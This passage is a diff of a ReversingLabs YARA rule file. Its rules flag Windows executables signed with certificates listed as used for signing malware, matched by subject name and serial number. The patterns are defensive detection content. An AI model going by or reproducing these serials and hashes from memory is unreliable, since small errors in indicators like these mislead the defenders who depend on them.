"bd20cf8e4cab2117361dbe05ae2efe813e7f55667b1f3825cd893313d98dcb5f" score = 75 quality = 90 tags = "INFO, FILE" @@ -13262,22 +33053,22 @@ rule REVERSINGLABS_Cert_Blocklist_0Dd7D4A785990584D8C0837659173272 : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "\\xE9\\x9B\\xB7\\xE7\\xA5\\x9E\\xEF\\xBC\\x88\\xE6\\xAD\\xA6\\xE6\\xB1\\x89\\xEF\\xBC\\x89\\xE4\\xBF\\xA1\\xE6\\x81\\xAF\\xE6\\x8A\\x80\\xE6\\x9C\\xAF\\xE6\\x9C\\x89\\xE9\\x99\\x90\\xE5\\x85\\xAC\\xE5\\x8F\\xB8" and pe.signatures[i].serial=="0d:d7:d4:a7:85:99:05:84:d8:c0:83:76:59:17:32:72" and 1586249095<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "GLARYSOFT LTD" and pe.signatures[i].serial=="0b:6d:81:52:f4:a0:6b:a7:81:c6:67:7e:ea:5a:b7:4b" and 1568246400<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_0C59D46580F039Af2C4Ab6Ba0Ffed197 : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_3Ad60Cea73E1Dd1A3E6C02D9B339C380 : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "969e05a1-8ae1-5ea6-9607-5bf164f34e7b" + id = "80b39632-29a7-5932-a47b-736a9e8ed686" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L9330-L9346" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "32eea2a436f386ef44a00ef72be8be7d4070b02f84ba71c7ee1ca407fddce8ec" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L3342-L3358" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "fb83cf25be19e7cccd2c8369c3a37a90af72cb2f76db3619b8311d2a851335a8" score = 75 quality = 90 tags = "INFO, FILE" @@ -13287,22 +33078,22 @@ rule REVERSINGLABS_Cert_Blocklist_0C59D46580F039Af2C4Ab6Ba0Ffed197 : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "\\xE5\\xA4\\xA7\\xE8\\xBF\\x9E\\xE7\\xBA\\xB5\\xE6\\xA2\\xA6\\xE7\\xBD\\x91\\xE7\\xBB\\x9C\\xE7\\xA7\\x91\\xE6\\x8A\\x80\\xE6\\x9C\\x89\\xE9\\x99\\x90\\xE5\\x85\\xAC\\xE5\\x8F\\xB8" and pe.signatures[i].serial=="0c:59:d4:65:80:f0:39:af:2c:4a:b6:ba:0f:fe:d1:97" and 1585108595<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "CUS Software GmbH" and pe.signatures[i].serial=="3a:d6:0c:ea:73:e1:dd:1a:3e:6c:02:d9:b3:39:c3:80" and 1567036800<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_0448Ec8D26597F99912138500Cc41C1B : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_7Df2Dfed47C6Fd6542131847Cffbc102 : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "0c306a1f-e810-5988-a44c-964b6a67c918" + id = "306444d8-7573-58c6-b6fe-14d701942275" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L9348-L9364" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "001556c31cfb0d94978adc48dc0d24c83666512348c65508975cc9e1a119aeae" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L3360-L3376" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "fc6adbfd45ff6ac465aecb3db862421f02170e977fc044017f3ddc306a9f7a37" score = 75 quality = 90 tags = "INFO, FILE" @@ -13312,22 +33103,22 @@ rule REVERSINGLABS_Cert_Blocklist_0448Ec8D26597F99912138500Cc41C1B : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "\\xE5\\xA4\\xA7\\xE8\\xBF\\x9E\\xE7\\xBA\\xB5\\xE6\\xA2\\xA6\\xE7\\xBD\\x91\\xE7\\xBB\\x9C\\xE7\\xA7\\x91\\xE6\\x8A\\x80\\xE6\\x9C\\x89\\xE9\\x99\\x90\\xE5\\x85\\xAC\\xE5\\x8F\\xB8" and pe.signatures[i].serial=="04:48:ec:8d:26:59:7f:99:91:21:38:50:0c:c4:1c:1b" and 1585108595<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "AFVIMPEX SRL" and pe.signatures[i].serial=="7d:f2:df:ed:47:c6:fd:65:42:13:18:47:cf:fb:c1:02" and 1567036800<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_0108Cbaee60728F5Bf06E45A56D6F170 : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_74Fedf0F8398060Fa8378C6D174465C8 : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "2be3a0d2-2c6a-5c66-856a-d3a70a490ba3" + id = "eea46214-d0f5-5e92-b678-4a1df09025ce" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L9366-L9382" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "52027548e20c819e73ea5e9afd87faaca4498bc39e54dd30ad99a24e3ace57fd" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L3378-L3394" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "406821c7990f05fdad91704f6418304f53dd4800bc4b41912177a1695858fade" score = 75 quality = 90 tags = "INFO, FILE" @@ -13337,22 +33128,22 @@ rule REVERSINGLABS_Cert_Blocklist_0108Cbaee60728F5Bf06E45A56D6F170 : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "\\xE6\\xAD\\xA6\\xE6\\xB1\\x89\\xE4\\xB8\\x9C\\xE6\\xB9\\x96\\xE6\\x96\\xB0\\xE6\\x8A\\x80\\xE6\\x9C\\xAF\\xE5\\xBC\\x80\\xE5\\x8F\\x91\\xE5\\x8C\\xBA" and pe.signatures[i].serial=="01:08:cb:ae:e6:07:28:f5:bf:06:e4:5a:56:d6:f1:70" and 1605680260<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "DOCS PTY LTD" and pe.signatures[i].serial=="74:fe:df:0f:83:98:06:0f:a8:37:8c:6d:17:44:65:c8" and 1566172800<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_038D56A12153E8B5C74C69Bff65Cbe3F : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_3Bd6A5Bba28E7C1Ca44880159Dace237 : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "48162554-a95b-5cd3-9bbb-bcf6a1d96592" + id = "c80245bd-908a-5b89-92e3-af0dd7bed63a" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L9384-L9400" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "ed3a81231f93f9d2ae462481503ba37072c3800dd1379baae11737f093a27af1" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L3396-L3412" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "f885c782148947d09133a3cc65319e02204c21d6c6d911b360840f25f37601dc" score = 75 quality = 90 tags = "INFO, FILE" @@ -13362,22 +33153,22 @@ rule REVERSINGLABS_Cert_Blocklist_038D56A12153E8B5C74C69Bff65Cbe3F : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "\\xE6\\xAD\\xA6\\xE6\\xB1\\x89\\xE5\\x86\\x85\\xE7\\x91\\x9F\\xE6\\x96\\xAF\\xE7\\xA7\\x91\\xE6\\x8A\\x80\\xE6\\x9C\\x89\\xE9\\x99\\x90\\xE5\\x85\\xAC\\xE5\\x8F\\xB8" and pe.signatures[i].serial=="03:8d:56:a1:21:53:e8:b5:c7:4c:69:bf:f6:5c:be:3f" and 1605680260<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "TECHNO BEAVERS LIMITED" and pe.signatures[i].serial=="3b:d6:a5:bb:a2:8e:7c:1c:a4:48:80:15:9d:ac:e2:37" and 1563408000<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_060D94E2Ccae84536654D9Daf39Fef1E : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_C04F8F1E00C69E96A51Bf14Aab1C6Ae0 : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "ac5d29ef-fd52-536b-bcbc-44433dda8a21" + id = "6513160e-ece5-500b-8b0b-4b8a6e04c0af" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L9402-L9418" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "49000f3a3ce1ad9aef87162d7527b8f062e0aa12276b82c7335f0ccc14b7d38a" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L3414-L3432" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "c2b5ffa305b761b57dd91c0acea0d8f82bec6b7d3608be10a20ea63621f3f3e8" score = 75 quality = 90 tags = "INFO, FILE" @@ -13387,22 +33178,22 @@ rule REVERSINGLABS_Cert_Blocklist_060D94E2Ccae84536654D9Daf39Fef1E : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "HasCred ApS" and pe.signatures[i].serial=="06:0d:94:e2:cc:ae:84:53:66:54:d9:da:f3:9f:ef:1e" and 1627948800<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "CHAIKA, TOV" and (pe.signatures[i].serial=="00:c0:4f:8f:1e:00:c6:9e:96:a5:1b:f1:4a:ab:1c:6a:e0" or pe.signatures[i].serial=="c0:4f:8f:1e:00:c6:9e:96:a5:1b:f1:4a:ab:1c:6a:e0") and 1551398400<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_0Bc9B800F480691Bd6B60963466B0C75 : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_23F537Ce13C6Cccdfd3F8Ce81Fb981Cb : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "614f88ca-183a-548b-99f1-30cf4c4027ce" + id = "f48b7818-5b34-5609-822a-39a2e7fb44c5" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L9420-L9436" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "6a498fd30c611976e9aad2f9b85b13c3c29246582cdfefc800615db88e40dac2" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L3434-L3450" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "d347bce3eddd0cac276a7504955f0342ae44fd93d238e514af5b1fdc208b68fc" score = 75 quality = 90 tags = "INFO, FILE" @@ -13412,22 +33203,22 @@ rule REVERSINGLABS_Cert_Blocklist_0Bc9B800F480691Bd6B60963466B0C75 : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "HasCred ApS" and pe.signatures[i].serial=="0b:c9:b8:00:f4:80:69:1b:d6:b6:09:63:46:6b:0c:75" and 1629158400<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "ISECURE GROUP PTY LTD" and pe.signatures[i].serial=="23:f5:37:ce:13:c6:cc:cd:fd:3f:8c:e8:1f:b9:81:cb" and 1566086400<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_0C4324Ff41F0A7B16Ffcc93Dffa8Fa99 : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_73Ecfdbb99Aec176Ddfcf7958D120E1A : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "34594a57-f9fd-5b9d-afb6-691be33da9b5" + id = "84e20878-e4ea-53a5-9c1b-04f3c66276de" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L9438-L9454" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "d3ce83fb0497c533a5474d46300c341677ec243686723783798bfbaec4f6e369" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L3452-L3468" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "d911156707cef97acf79c096b5d4a4db166ddf05237168f1ecffb0c0a2ebd8fa" score = 75 quality = 90 tags = "INFO, FILE" @@ -13437,22 +33228,22 @@ rule REVERSINGLABS_Cert_Blocklist_0C4324Ff41F0A7B16Ffcc93Dffa8Fa99 : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "\\xE7\\xA6\\x8F\\xE5\\xBB\\xBA\\xE7\\x9C\\x81\\xE4\\xBA\\x94\\xE6\\x98\\x9F\\xE4\\xBF\\xA1\\xE6\\x81\\xAF\\xE7\\xA7\\x91\\xE6\\x8A\\x80\\xE6\\x9C\\x89\\xE9\\x99\\x90\\xE5\\x85\\xAC\\xE5\\x8F\\xB8" and pe.signatures[i].serial=="0c:43:24:ff:41:f0:a7:b1:6f:fc:c9:3d:ff:a8:fa:99" and 1600300800<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "MHOW PTY LTD" and pe.signatures[i].serial=="73:ec:fd:bb:99:ae:c1:76:dd:fc:f7:95:8d:12:0e:1a" and 1566864000<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_0B980Fc8783E4F158E41829Ab21Bab81 : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_675129Bb174A5B05E330Cc09F8Bbd70A : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "f7358f71-421f-57fa-abdf-ab479f4b7007" + id = "97046206-efc4-58dd-a9df-4966bad3902d" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L9456-L9472" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "b0f43caec1cfc5b2d1512d7fcf0bcf1e02fc81764b4376b081f38c4de328eab2" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L3470-L3486" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "d989ea5233e8a64bffa0e29645c3458ef1f5173158ced7814c3b473b92ef49f4" score = 75 quality = 90 tags = "INFO, FILE" @@ -13462,22 +33253,22 @@ rule REVERSINGLABS_Cert_Blocklist_0B980Fc8783E4F158E41829Ab21Bab81 : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Idris Kanchwala Holding Corp." and pe.signatures[i].serial=="0b:98:0f:c8:78:3e:4f:15:8e:41:82:9a:b2:1b:ab:81" and 1631750400<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "ALEX & CO PTY LIMITED" and pe.signatures[i].serial=="67:51:29:bb:17:4a:5b:05:e3:30:cc:09:f8:bb:d7:0a" and 1565568000<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_D8F515715Aeffef0A0E4E37F16C254Fa : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_De13Fe2Dbb8F890287E1780Aff6Ffd22 : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "50ffd0a0-d861-53d7-a7dc-f74ccc49eff8" + id = "d2b15920-76ae-54e4-988c-278a3622ec52" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L9474-L9492" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "3c7d57a655f76a6e5ef6b0e770db7c91d0830b6b0b37caef5ef9e3e78ad1fd75" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L3488-L3504" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "ebd983bcfa1e5d54af9d9e07d80d05f4752040eab92e63cd986db789fa07026f" score = 75 quality = 90 tags = "INFO, FILE" @@ -13487,22 +33278,22 @@ rule REVERSINGLABS_Cert_Blocklist_D8F515715Aeffef0A0E4E37F16C254Fa : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "HOLDING LA LTD" and (pe.signatures[i].serial=="00:d8:f5:15:71:5a:ef:fe:f0:a0:e4:e3:7f:16:c2:54:fa" or pe.signatures[i].serial=="d8:f5:15:71:5a:ef:fe:f0:a0:e4:e3:7f:16:c2:54:fa") and 1619136000<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "LAST TIME PTY LTD" and pe.signatures[i].serial=="de:13:fe:2d:bb:8f:89:02:87:e1:78:0a:ff:6f:fd:22" and 1566259200<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_D79739187C585E453C00Afc11D77B523 : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_Da000D18949C247D4Ddfc2585Cc8Bd0F : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "ed427336-6833-5e09-8ebe-039c8cd50846" + id = "3e939b73-abe4-5941-93ab-18bcde854aaf" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L9494-L9512" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "6d6db87227d7be559afa67c4f2b65b01f26741fdf337d920241a633bb036426f" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L3506-L3524" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "3453f13e633a2c233f78d0389c655bb5304e567407b3e0c5c47e5e7127c345ca" score = 75 quality = 90 tags = "INFO, FILE" @@ -13512,22 +33303,22 @@ rule REVERSINGLABS_Cert_Blocklist_D79739187C585E453C00Afc11D77B523 : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "SAN MARINO INVESTMENTS PTY LTD" and (pe.signatures[i].serial=="00:d7:97:39:18:7c:58:5e:45:3c:00:af:c1:1d:77:b5:23" or pe.signatures[i].serial=="d7:97:39:18:7c:58:5e:45:3c:00:af:c1:1d:77:b5:23") and 1631059200<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "PORT-SERVIS LTD" and (pe.signatures[i].serial=="00:da:00:0d:18:94:9c:24:7d:4d:df:c2:58:5c:c8:bd:0f" or pe.signatures[i].serial=="da:00:0d:18:94:9c:24:7d:4d:df:c2:58:5c:c8:bd:0f") and 1564444800<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_961Cecb0227845317549E9343A980E91 : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_06E842D3Ea6249D783D6B55E29C060C7 : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "f319592a-5f08-5f2c-b840-5f897695e054" + id = "37829f07-c569-5e46-8b7a-2137c4c801e8" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L9514-L9532" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "c74512e95e2d6aedecb1dbd30fac6fde40d1e9520c89b785519694d9bc9ba854" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L3526-L3542" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "9f71de0119527c8580f9e47e3fba07242814c5a537d727d4541fd7a802b0cb86" score = 75 quality = 90 tags = "INFO, FILE" @@ -13537,22 +33328,22 @@ rule REVERSINGLABS_Cert_Blocklist_961Cecb0227845317549E9343A980E91 : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "AmiraCo Oy" and (pe.signatures[i].serial=="00:96:1c:ec:b0:22:78:45:31:75:49:e9:34:3a:98:0e:91" or pe.signatures[i].serial=="96:1c:ec:b0:22:78:45:31:75:49:e9:34:3a:98:0e:91") and 1615248000<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "PORT-SERVIS LTD, TOV" and pe.signatures[i].serial=="06:e8:42:d3:ea:62:49:d7:83:d6:b5:5e:29:c0:60:c7" and 1565568000<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_1Ef6392B2993A6F67578299659467Ea8 : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_06473C3C19D9E1A9429B58B6Faec2967 : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "123e5aed-0ef4-5146-81bb-5d455a9cf92e" + id = "01eba681-8c98-5553-b369-941b6dba11e2" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L9534-L9550" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "f6b454a575ea7635d5edebffe3c9c83e95312ee33245e733987532348258733e" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L3544-L3560" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "f9ca49ce65d213dce803806956c0ce1da0c4068bea173daae9cb06dab0a86268" score = 75 quality = 90 tags = "INFO, FILE" @@ -13562,22 +33353,22 @@ rule REVERSINGLABS_Cert_Blocklist_1Ef6392B2993A6F67578299659467Ea8 : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "ALUSEN d. o. o." and pe.signatures[i].serial=="1e:f6:39:2b:29:93:a6:f6:75:78:29:96:59:46:7e:a8" and 1618531200<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Digital Leadership Solutions Limited" and pe.signatures[i].serial=="06:47:3c:3c:19:d9:e1:a9:42:9b:58:b6:fa:ec:29:67" and 1581984001<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_A918455C0D4Da7Ca474F41F11A7Cf38C : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_39F56251Df2088223Cc03494084E6081 : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "959b10fe-fbd0-5642-a5d9-4ac2e0474666" + id = "0c475e89-9729-53b9-a301-7a9faa0fef91" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L9552-L9570" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "ea30d85c057f9363ce29d4c024097c50a8752dd2095481181322fe5d5c92bb4b" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L3562-L3578" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "c87850f91758a5bb3bdf6f6d7de9a3f53077d64cebdde541ac0742d3cea4f4e0" score = 75 quality = 90 tags = "INFO, FILE" @@ -13587,22 +33378,22 @@ rule REVERSINGLABS_Cert_Blocklist_A918455C0D4Da7Ca474F41F11A7Cf38C : INFO FILE importance = 25 